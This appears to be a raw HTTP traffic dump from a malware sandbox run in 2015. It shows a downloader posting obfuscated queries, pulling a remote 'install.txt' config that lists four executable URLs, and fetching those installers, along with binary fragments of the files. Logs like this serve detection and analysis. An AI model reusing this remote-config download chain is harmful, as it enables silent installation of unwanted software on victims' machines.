Location: hXXp://103.7.29.215/dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe
The actual URL is '/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe'...
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024935640818948618110713
Server: Apache
tracecode: 00024935640818948618110713
Set-Cookie: BAIDUID=B2053B857F2258D2E04896EB7F862B42:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Host: c.pc.qq.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:15 GMT
Server: HTTP Load Balancer/2.0
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
Cache-Control: no-cache
Pragma: no-cache
9 pYvSlibR11BBHT94yIhGPAt79f8hv 7svHsaQzYjRmLcqv1LAwkIvcgP7soaYd8xihktDkjBh41ybhkE A/W QeiOxDawh 5QfOgNOZcRQzGOx18PeWfALa2zzBVzX mlyOKd4C7W/vxy330jna us6KFWIPTONKYHpcUatFiVy5Y5gUYnNI4uHDLhKesCQLdNHqLAbsIrEL0muXpsiZuySxm5Wh6cwBxK6jy5jBPSfaL5oGQmZHK8fyw3yLYcGDz4yWYuKaw ofWxwWEBtQheKnfk2DFlZTRBhcBWHtzYVbHtd4WWEOYHFFoBIFvAQwNF/cTCsEayNFZ4wKacBfliiM4QoeIR1MCS1aFzbmqfyFWYh6rJLbA6mSglP2KPL2wqy0hLYPnUs/0SQhcyggh/akSwJQHfL2Ss6wZfJIGJ5kkNsbpkw0gIrGe INDDKXcYjvmckjr36Mw5IFom0hWnfqJke4zDNaWuvzEWvToloip OFdM7c2MsfWzE1Cb tyeGhlaFWg5mJbjsGruvQwQpbiVs0 b8DuNGWrnKskmSJZPEHWBjsAwZ7C4BpbNAwzEiZOeQ64AqfWW4KoaGYH7H49zIVSkhD9CP8GV2fHUnI1sX BptP6c6PW5IEkjTob5lyfr/oyNgpdc4lJ4md9NfI0LdgPHTTP/1.1 200 OK..Date: Sat, 07 Nov 2015 05:00:15 GMT..Server: HTTP Load Balancer/2.0..Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT..Content-Length: 672..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: application/octet-stream..Cache-Control: no-cache..Pragma: no-cache..9 pYvSlibR11BBHT94yIhGPAt79f8hv 7svHsaQzYjRmLcqv1LAwkIvcgP7soaYd8xihktDkjBh41ybhkE A/W QeiOxDawh 5QfOgNOZcRQzGOx18PeWfALa2zzBVzX mlyOKd4C7W/vxy330jna us6KFWIPTONKYHpcUatFiVy5Y5gUYnNI4uHDLhKesCQLdNHqLAbsIrEL0muXpsiZuySxm5Wh6cwBxK6jy5jBPSfaL5oGQmZHK8fyw3yLYcGDz4yWYuKaw ofWxwWEBtQheKnfk2DFlZTRBhcBWHtzYVbHtd4WWEOYHFFoBIFvAQwNF/cTCsEayNFZ4wKacBfliiM4QoeIR1MCS1aFzbmqfyFWYh6rJLbA6mSglP2KPL2wqy0hLYPnUs/0SQhcyggh/akSwJQHfL2Ss6wZfJIGJ5kkNsbpkw0gIrGe INDDKXcYjvmckjr36Mw5IFom0hWnfqJke4zDNaWuvzEWvToloip OFdM7c2MsfWzE1Cb tyeGhlaFWg5mJbjsGruvQwQpbiVs0 b8DuNGWrnKskmSJZPEHWBjsAwZ7C
<<< skipped >>>
GET /17476535.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1862
Content-Type: application/x-javascript
Last-Modified: Fri, 07 Aug 2015 04:22:10 GMT
Accept-Ranges: bytes
ETag: "cc562aa1c8d0d01:339f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 Nov 2015 04:44:38 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?17476535" target="_blank" title="51.La 网站流量统计系统">网站统计</a>\n');..var a6535tf="51la";var a6535pu="";var a6535pf="51la";var a6535su=window.location;var a6535sf=document.referrer;var a6535of="";var a6535op="";var a6535ops=1;var a6535ot=1;var a6535d=new Date();var a6535color="";if (navigator.appName=="Netscape"){a6535color=screen.pixelDepth;} else {a6535color=screen.colorDepth;}..try{a6535tf=top.document.referrer;}catch(e){}..try{a6535pu =window.parent.location;}catch(e){}..try{a6535pf=window.parent.document.referrer;}catch(e){}..try{a6535ops=document.cookie.match(new RegExp("(^| )a6535_pages=([^;]*)(;|$)"));a6535ops=(a6535ops==null)?1: (parseInt(unescape((a6535ops)[2])) 1);var a6535oe =new Date();a6535oe.setTime(a6535oe.getTime() 60*60*1000);document.cookie="a6535_pages=" a6535ops ";path=/;expires=" a6535oe.toGMTString();a6535ot=document.cookie.match(new RegExp("(^| )a6535_times=([^;]*)(;|$)"));if(a6535ot==null){a6535ot=1;}else{a6535ot=parseInt(unescape((a6535ot)[2])); a6535ot=(a6535ops==1)?(a6535ot 1):(a6535ot);}a6535oe.setTime(a6535oe.getTime() 365*24*60*60*1000);document.cookie="a6535_times=" a6535ot ";path=/;expires=" a6535oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a6535ops=-1;a6535ot=-1;}}catch(e){}..a6535of=a6535sf;if(a6535pf!=="51la"){a6535of=a6535pf;}if(a6535tf!=="51la"){a6535of=a6535tf;}a6535op=a6535pu;try{lainframe}catch(e){a6535op=a6535su;}..a6535src=
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008958911911494410110713
Server: Apache
tracecode: 00008958911911494410110713
Set-Cookie: BAIDUID=32F3C5706F8B2402BD0EB1E10803435C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033318230271667466110713
Server: Apache
tracecode: 00033318230271667466110713
Set-Cookie: BAIDUID=37CF03EF72C69E44B1D413F21243AFB1:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016873191213477898110713
Server: Apache
tracecode: 00016873191213477898110713
Set-Cookie: BAIDUID=69DAC83DF6D595A39DEA8B5044D5BB76:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /package/201511/7c9ddd8b4b286eef807bc97513948574.exe HTTP/1.1
Host: dlsw.br.baidu.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP3/2.0.13
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: application/octet-stream
Content-Length: 7981400
Connection: keep-alive
ETag: "5638867b-79c958"
Last-Modified: Tue, 03 Nov 2015 10:03:39 GMT
Expires: Fri, 19 Oct 2018 09:08:15 GMT
Age: 244305
Cache-Control: max-age=93312000
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........N..,N..,N..,G.&,O..,UC;,U..,UC.,...,G.6,S..,N..,{..,UC., ..,UC.,...,UC?,O..,UC8,O..,RichN..,........PE..L...X.8V......................q...................@..........................0z......`z...@..................................l..........X|m...........y.X.....y......,.......................m.......m..@...............4............................text............................... ..`.rdata..hn.......p..................@..@.data................n..............@....tls................................@....rsrc...X|m......~m.................@..@.reloc........y.......x.............@..B................................................................................................................................................................................................................................................................................................................h$...h..I..A..........3....j.Y.....t....t.!.......).........H.F...|.3.......@.."|......9.....~.......k...............j.Y.....u............=..H...3.j.Y.....u.........3.1.....}..............j.[....u.!.....A...|.3.1.....}..............j.[....u.!.....A...|.3.......@...|.9.....~.......k...............j.Y.....u.............3.j.Y.....u.....................;.~.k...............j.Y.....u.............3.j.Y.....u.........3....j.[..3.C;.u.!.............A...|.3.......@...|.9.....~.......k...............j.Y.....u.........
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024709301213477898110713
Server: Apache
tracecode: 00024709301213477898110713
Set-Cookie: BAIDUID=B2053B857F2258D27384FF197E418516:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049372701213477898110713
Server: Apache
tracecode: 00049372701213477898110713
Set-Cookie: BAIDUID=6D7EF984AD0193644A842C3587268107:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991293201911494410110712
Server: Apache
tracecode: 35991293201911494410110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BB9311240B7EFFFDC:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /tool/install.txt HTTP/1.1
User-Agent: DownUpLoad
Host: conf.a101.cc
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 12:58:57 GMT
Content-Type: application/octet-stream
Content-Length: 344
Last-Modified: Wed, 04 Nov 2015 09:04:40 GMT
Connection: keep-alive
ETag: "5639ca28-158"
Accept-Ranges: bytes
[field0]..url=hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe..[field1]..url=hXXp://download.suxiazai.com/for_down/2013/install1393485.exe..[field2]..url=hXXp://mm.appkhh.com/mmliao/MM-liao8863.exe..[field3]..url=hXXp://j.br.baidu.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe..[common]..number=4..filename=qq|rx|mm|bd..
GET /invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe HTTP/1.1
Host: dlied6.qq.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: nws 1.2.15
Connection: close
Date: Sat, 07 Nov 2015 04:59:58 GMT
Expires: Sat, 07 Nov 2015 04:59:58 GMT
Cache-Control: max-age=0
Content-Length: 73
Location: hXXp://203.205.148.185/dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe
The actual URL is '/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe'...
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117949801911494410110713
Server: Apache
tracecode: 00117949801911494410110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA0573611A9CC38E2099E:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00080725311213477898110713
Server: Apache
tracecode: 00080725311213477898110713
Set-Cookie: BAIDUID=DA04B4066DA68D7200C3C53637253F4C:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00109337490271667466110713
Server: Apache
tracecode: 00109337490271667466110713
Set-Cookie: BAIDUID=BA43C3B59B01A15FE3D46D7CEF95CB13:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00025792010818883082110713
Server: Apache
tracecode: 00025792010818883082110713
Set-Cookie: BAIDUID=B2053B857F2258D266D348C433DA33B2:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008202790818883082110713
Server: Apache
tracecode: 00008202790818883082110713
Set-Cookie: BAIDUID=32F3C5706F8B24028DF67F10D2BD5887:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: PWS/8.1.20.25
X-Px: rf-ht h0-s1127.p11-fra ( h0-s1214.p11-fra), ht h0-s1214.p11-fra.cdngp.net
ETag: "5506987c-1ede"
Cache-Control: max-age=7200
Expires: Sat, 07 Nov 2015 05:23:11 GMT
Age: 5838
Content-Length: 7902
Content-Type: image/gif
Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT
Connection: keep-alive
GIF89as.r.................................................^....A...................! ............B.....}....................1)-t....................j...........................................................c..>..p[E............z...........q.....u.....j.........................................Z.................b..................................................^................................!.......,....s.r.....'..........X......'...............................X.............................X......................................)....Fz%.K.1.......*\......#J.H.....3".........I.....'K.S..e..0..\).&..-m...RgO.3w..94(..F..T.t...P.J.J.*..X...*....%Fr.K....h..].....p....KWn..x....p...'..\....... ^......#K.L.....3C..w..................@...c.....k..g....v.......|....q ..{.....K...te...k..0...'....F......_.........O..............z....B.Y_:.....6.........ZP...b(a..n.!......!.8..".h..(..b.0....2.x..8....;>...@.._.D.i...&i`..q.1..PF)..P>Y..Db...\....^....Y.Y&.[..&._....o....r....l.y..|......J....j(.5$...p\..gIzV..p.....f....v.....*....j.............".....j..<........... ....k...&....6...MD m...X...8....L.....;m.........n....n........ko...................0..$....7....G,....`...< ........C ...$.l.....2.*[.2./.... ..2.7..3.;.,..<....=.-t.H..t.L....PG-..TS...Xg...(t.5...$.....I......_....p{..._....(..w.|....}..w...>.............G....W....d....w.y......].`..80 6.............n............../....o|..$..........Q..U...GF0....w...../.....o.............3 ....a..X.!A!K.....0...@......L......:......'H..Z.......
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049406280658453514110713
Server: Apache
tracecode: 00049406280658453514110713
Set-Cookie: BAIDUID=6D7EF984AD0193644126EE9989BC78F5:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /for_down/2013/install1393485.exe HTTP/1.1
Host: download.suxiazai.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 4787104
Date: Thu, 29 Oct 2015 05:44:24 GMT
Content-Type: application/octet-stream
ETag: "a88697daded0d01:608b2"
Server: Microsoft-IIS/6.0
Last-Modified: Fri, 07 Aug 2015 07:01:16 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Age: 774938
Via: http/1.1 fnop003-GDSTDX-CT-248-102 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-158 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-165 (ACA/2.0 ACA_HIT)
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c...............m.......d.....1.......<.R.....<.P.......P.....E...........B...1.m.....1.R.#...S.S.....1.W.....Rich............PE..L....i.T.....................0......`.............@........................... .....j.I.........................................D........'............H.............................................P...H...........................................UPX0....................................UPX1................................@....rsrc....0.......*..................@..............................................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....^v..........W....^Q.&..W_h;...(..{.U..A...;U#.8S..(....t.ZG(.W.R..-G.V..._.......V.Ig.............:...G......u.(....#.Q.B...T.......$.9..]...w.ZZ.dE.W..._..fw ..V/............ .[.r.XO..L..q...;\...XI....2n_L......Y..qZG..)..'MA.h.3..Q...by^.XH........=..&.al$j..M..Z.~i..cmF..*..^.).zg..,7...!.$.or...TI\.^..lV.Zg..D..I...}.EW..o.z.."O.....g......$..UV.O...dp..<$X&W.J...>....>....l.C..d(.i.n.*..S@3b...........s..&K|....!......$................J.~..$..@p....................K.1Srb{.7.SQ......L.....?.i...m.y..N.u.)....u.
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999987180581376522110712
Server: Apache
tracecode: 35999987180581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B79939E6BDE03F0EE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
.#4H..........T.........................................a..................................................................................S8.....[3..
Z*.............V. !JWPU...MFBII..A@.P[X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..
.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\._...N...a6..T..Y".......{......{f...h
....<)..8....m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o...p...q.s.."#$%&'()..:-./01
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00136416251213477898110713
Server: Apache
tracecode: 00136416251213477898110713
Set-Cookie: BAIDUID=67699F784E2A0D23E0CC41DD2DA72AC7:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /ptlogin/ver/10139/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: PWS/8.1.20.25
X-Px: ms h0-s1127.p11-fra ( h0-s1129.p11-fra), ht h0-s1129.p11-fra.cdngp.net
ETag: "5636be2e-21f8"
Cache-Control: max-age=600
Expires: Sat, 07 Nov 2015 05:00:41 GMT
Age: 588
Content-Length: 3459
Content-Type: application/x-javascript
Content-Encoding: gzip
Vary: Accept-Encoding
Last-Modified: Mon, 02 Nov 2015 01:36:46 GMT
Connection: keep-alive
......6V...Z.w.... X....,..i..qR'..........#.....w........O.i.#''.F..43..4.2.m.......s.D...E`'....0q.2..n}....2..E.g..oD$G.....=.Ca..w.j..M...F5F@.-..v...O\...z.@...f...]R.m6.....zr~u.K.8}wv.K....H5........LWj...X.\..=5.>:...:9$....S......?V.*v.....vG...`.{..t...v.....<.".N.:.(.b.G....:....:..g.............1...r.......9H..cT.._.....Z.n.p.....&...8t.0P......C....LN........._..;G.j.@s...15q.K...9......._...^....Fdbq.LI..na...p......X...F.r.....2...6.q..8..H.B....;j .......-.....fs.j.Q .......?..Kb&H........>h.|.......e>...*...H..J<.E?..Uv.,.@77W.O...C.]O...,.....Co.,.z.1*..W....j..J.\..s=...`.....*.../Dma.....t.p.0...~......1$m3...;F~>n&_f?_\}<..]^..._.&>..T.<..".S....b.......;...f...IL..E.Q...U>..P..iZ..B*V....V..../....|....&......|.....)........[l..!..N..........R=. dZ.X...x........_,...!."t.~_...-.....g!....1..S.#..J.~...p .q..q.....n....uX..sZ._..u...D... s...F....._~4.;.......b..=..k.Kh=.....s...vp.8....f.....*Y..K.s|..4..f....p.w.G.........I.......&]3...........GU....rh/. V.@...?.....{.HC......A.}."..5L.&.....v....4...$..$h.....a"j2..F...4j>$Y...[l.8....jR .G.QC...5.....3..;.e..O..w....63Z...Q.z!.|N.*. 